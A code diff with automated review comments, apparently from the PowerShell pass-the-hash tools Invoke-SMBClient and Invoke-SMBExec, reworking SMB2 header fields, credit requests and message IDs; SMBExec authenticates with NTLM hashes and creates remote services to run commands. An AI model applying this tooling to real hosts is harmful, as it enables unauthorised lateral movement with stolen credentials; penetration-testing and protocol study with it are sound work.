$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1042,8 +1048,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1058,9 +1063,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'NTLMSSPNegotiate'
{
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
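Review bot: The NTLMSSPNegotiate session-setup header now requests zero credits (`0x00,0x00`) where it previously requested `0x1f,0x00`, and the auth stage does the same in the hunk ending at L1634, while the equivalent stages in Invoke-SMBExec.ps1 (hunks ending at L1867 and L1878) keep `0x1f,0x00`. If the zero request is deliberate, a comment on the line would stop the next reader from "fixing" it back, e.g. `# request 0 credits during session setup; later stages request 1`; if not, the two files should agree. The enclosing switch continues outside the hunk.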
@@ -1173,9 +1177,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
$NTLMv2_response
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1240,8 +1243,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeConnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1354,8 +1356,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_ioctl_path = "\" + $Target + "\" + $Share
$SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1388,8 +1389,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1686,8 +1686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'QueryInfoRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["NextCommand"] = $header_next_command
if($SMB_signing)
@@ -1709,8 +1708,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1859,8 +1857,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'SetInfoRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1920,8 +1917,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequestFindRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -1947,8 +1943,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00
if($SMB_signing)
@@ -1974,8 +1969,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2c_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2229,8 +2223,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
$SMB_file_ID = $SMB_client_receive[132..147]
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00
if($SMB_signing)
@@ -2252,8 +2245,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2322,8 +2314,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_file_ID = $SMB_client_receive[132..147]
}
- $SMB2_message_ID ++
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2443,7 +2435,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'ReadRequest'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["CreditCharge"] = 0x01,0x00
if($SMB_signing)
@@ -2576,7 +2568,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_header["CreditCharge"] = 0x01,0x00
if($SMB_signing)
@@ -2653,7 +2645,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeDisconnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2694,7 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'Logoff'
{
$SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
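Review bot: The Logoff stage keeps `$SMB2_message_ID += 20` even though this commit lowers its CreditRequest to `0x01,0x00` and, in Invoke-SMBExec.ps1, replaces the equivalent `+= 20`/`+= 23` jumps with `++` (hunks ending at L1946, L1955 and L2024). If the jump was compensating for credits consumed by multi-credit reads, that no longer seems to apply here, since ReadRequest in this file sets `CreditCharge` to `0x01,0x00`; a message ID far beyond the granted window is something a server may reject. Consider `$SMB2_message_ID++` for consistency, or a comment explaining why the Logoff ID must skip ahead.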
diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1
index 7a4d868..1a2e3b5 100644
--- a/Invoke-SMBExec.ps1
+++ b/Invoke-SMBExec.ps1
@@ -72,10 +72,10 @@ param
[parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
[parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
[parameter(Mandatory=$false)][String]$Command,
- [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y",
[parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
[parameter(Mandatory=$false)][String]$Service,
- [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SigningCheck,
[parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
[parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
[parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
@@ -127,6 +127,8 @@ function New-PacketSMBHeader
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
@@ -338,7 +340,7 @@ function New-PacketSMBLogoffAndXRequest
}
#SMB2
-
+<#
function New-PacketSMB2Header
{
param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
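Review bot: Wrapping the old New-PacketSMB2Header in `<# … #>` leaves roughly 25 lines of dead code in the file, and the next hunk (ending at L1811) even edits the `CreditRequest` default inside that comment, which cannot have any effect. Since the replacement definition follows immediately (hunk ending at L1841), deleting the commented-out block is cleaner; the old version remains in version control.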
@@ -352,7 +354,7 @@ function New-PacketSMB2Header
$packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
$packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
$packet_SMB2Header.Add("Command",$packet_command)
- $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x01,0x00))
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
@@ -363,6 +365,31 @@ function New-PacketSMB2Header
return $packet_SMB2Header
}
+#>
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
function New-PacketSMB2NegotiateProtocolRequest
{
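Review bot: The new New-PacketSMB2Header emits `$packet_process_ID` into the header unchanged, unlike New-PacketSMBHeader, which trims its PID to two bytes in the hunk ending at L1794, so a caller passing anything other than a 4-byte array yields a header of the wrong length with no error. A comment on the `param` line would make that contract explicit: `# $packet_process_ID must be exactly 4 bytes; it is copied as-is into the 4-byte ProcessID field`. The definition duplicates the one added to Invoke-SMBClient.ps1 verbatim, which is presumably intended since the scripts are standalone.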
@@ -870,7 +897,6 @@ if($session_string)
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
if(!$session_string)
@@ -1008,7 +1034,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1044,8 +1070,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1182,8 +1208,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1560,7 +1586,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW'
{
$packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
-
+
if($SMB_signing)
{
$packet_SMB_header["Flags2"] = 0x05,0x48
@@ -2023,8 +2049,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'TreeConnect'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2065,12 +2090,10 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateRequest'
{
- #$SMB2_tree_ID = 0x01,0x00,0x00,0x00
$SMB2_tree_ID = $SMB_client_receive[40..43]
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2124,8 +2147,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB_file_ID = $SMB_client_receive[132..147]
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2160,12 +2182,9 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'ReadRequest'
{
-
Start-Sleep -m $Sleep
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
- $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2173,6 +2192,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
}
$packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
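Review bot: The read length is now pinned to `0xff,0x00,0x00,0x00` (255 bytes) and the previous `CreditCharge = 0x10,0x00` override is gone, so the header falls back to the 1-credit default in the new New-PacketSMB2Header; any response longer than 255 bytes would be truncated silently. If the svcctl replies read here are known to fit, record that next to the line, e.g. `# 255 bytes covers the svcctl replies read here and keeps the request within one credit`; otherwise the length should be derived from the expected response size. The ReadRequest stage starts in the preceding hunk and continues past this one.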
@@ -2216,9 +2236,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'OpenSCManagerW'
{
- $SMB2_message_ID += 23
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2280,7 +2299,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
else
{
Write-Output "$output_username is a local administrator on $Target"
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage = 2
$SMB_client_stage = 'CloseServiceHandle'
}
@@ -2304,9 +2323,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
if($SMBExec_command_bytes.Length -lt $SMB_split_index)
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2348,9 +2366,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2399,8 +2416,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
$SMB_split_stage++
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2447,8 +2463,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CreateServiceW_Last'
{
$SMB2_message_ID++
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2489,9 +2504,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
{
Write-Verbose "Service $SMB_service created on $Target"
$SMB_service_context_handle = $SMB_client_receive[112..131]
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2551,9 +2565,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
Write-Output "Service $SMB_service failed to start on $Target"
}
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2595,7 +2608,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
if($SMB_close_service_handle_stage -eq 1)
{
Write-Verbose "Service $SMB_service deleted on $Target"
- $SMB2_message_ID += 20
+ $SMB2_message_ID++
$SMB_close_service_handle_stage++
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
}
@@ -2606,8 +2619,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
@@ -2641,9 +2653,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table
'CloseRequest'
{
- $SMB2_message_ID += 20
- $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID
if($SMB_signing)
{
